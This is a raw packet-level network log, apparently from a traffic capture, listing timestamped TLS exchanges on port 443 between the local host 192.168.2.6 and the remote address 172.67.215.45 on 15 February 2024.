Feb 15, 2024 19:42:26.636960030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.636965990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.637001991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.637042999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.638431072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.638484001 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.638515949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.638524055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.638556957 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.638582945 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.640115976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.640170097 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.640208006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.640214920 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.640244007 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.640270948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.641680956 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.641738892 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.641771078 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.641777039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.641809940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.641830921 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.642997980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.643042088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.643075943 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.643083096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.643120050 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.643142939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.644933939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.644982100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.645020008 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.645026922 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.645045042 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.645066977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.646444082 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.646495104 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.646514893 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.646522045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.646548986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.646569014 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.648117065 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.648160934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.648183107 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.648190022 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.648216009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.648235083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.655096054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.655148029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.655172110 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.655193090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.655206919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.655227900 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.701534986 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.701606035 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.701742887 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.701765060 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.701817036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.702718019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.702765942 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.702797890 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.702805042 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.702826977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.702846050 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.704392910 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.704436064 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.704473019 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.704482079 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.704498053 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.704515934 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.706084967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.706127882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.706152916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.706161976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.706180096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.706198931 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.706952095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.706996918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.707024097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.707030058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.707055092 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.707073927 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.708961010 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.709003925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.709039927 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.709048033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.709059954 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.709084988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.710650921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.710695982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.710717916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.710725069 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.710750103 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.710767031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.712235928 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.712279081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.712312937 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.712321043 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.712340117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.712397099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.714018106 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.714065075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.714090109 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.714097977 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.714108944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.714131117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.715183020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.715225935 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.715246916 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.715255022 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.715270042 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.715291977 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.717365980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.717408895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.717439890 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.717446089 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.717457056 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.717478991 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.718581915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.718627930 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.718652964 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.718662024 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.718672037 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.718698025 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.720418930 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.720464945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.720483065 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.720489025 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.720508099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.720525980 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.721415997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.721458912 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.721482038 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.721487999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.721513987 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.721532106 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.723273039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.723328114 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.723341942 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.723347902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.723395109 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.725050926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.725092888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.725119114 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.725125074 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.725156069 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.725224972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.726722002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.726771116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.726793051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.726799011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.726851940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.727709055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.727751017 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.727782965 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.727790117 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.727818012 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.727833033 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.729434967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.729453087 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.729511976 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.729518890 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.729538918 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.729558945 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.731237888 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.731282949 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.731311083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.731317997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.731353045 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.731370926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.733025074 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.733078003 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.733104944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.733110905 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.733136892 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.733216047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.734771013 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.734812021 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.734838009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.734846115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.734867096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.734889030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.735796928 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.735845089 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.735892057 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.735898018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.735908031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.735935926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.737498045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.737541914 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.737562895 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.737569094 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.737603903 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.737627983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.739099026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.739146948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.739166021 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.739173889 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.739217043 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.741003990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.741049051 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.741071939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.741081953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.741112947 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.741132021 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.742033005 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.742077112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.742101908 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.742108107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.742136002 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.742153883 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.743899107 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.743938923 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.743969917 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.743976116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.744014978 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.744041920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.745687008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.745728970 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.745757103 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.745763063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.745789051 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.745822906 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.746562958 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.746604919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.746628046 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.746634007 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.746665955 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.746689081 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.747618914 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.747675896 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.747697115 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.747704029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.747728109 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.747749090 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.749329090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.749347925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.749382019 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.749387980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.749413013 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.749430895 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.750379086 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.750422955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.750441074 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.750463963 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.750494957 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.750519037 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.751373053 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.751425982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.751446962 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.751454115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.751475096 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.751496077 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.753103971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.753149033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.753164053 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.753170967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.753196955 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.753258944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.754169941 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.754215002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.754240990 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.754246950 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.754272938 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.754295111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.755261898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.755305052 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.755337000 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.755342960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.755372047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.755383968 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.756320000 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.756361961 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.756390095 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.756396055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.756428003 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.756448984 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.758038044 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.758085012 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.758109093 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.758115053 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.758141994 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.758163929 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.759042978 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.759088039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.759113073 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.759119034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.759144068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.759170055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.760139942 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.760184050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.760200024 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.760210991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.760231972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.760257006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.761822939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.761867046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.761894941 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.761903048 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.761931896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.761955023 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.762916088 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.762959003 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.762993097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.762998104 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.763024092 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.763042927 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.763973951 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.764018059 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.764036894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.764046907 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.764072895 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.764091969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.764998913 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.765043020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.765060902 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.765068054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.765100002 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.765121937 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.766745090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.766788960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.766813040 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.766822100 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.766848087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.766875029 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.767784119 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.767829895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.767848969 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.767855883 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.767877102 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.767894983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.768910885 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.768954992 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.768980026 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.768989086 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.769013882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.769031048 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.770073891 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.770123005 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:26.770169020 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:26.770176888 CET	443	49722	172.67.215.45	192.168.2.6
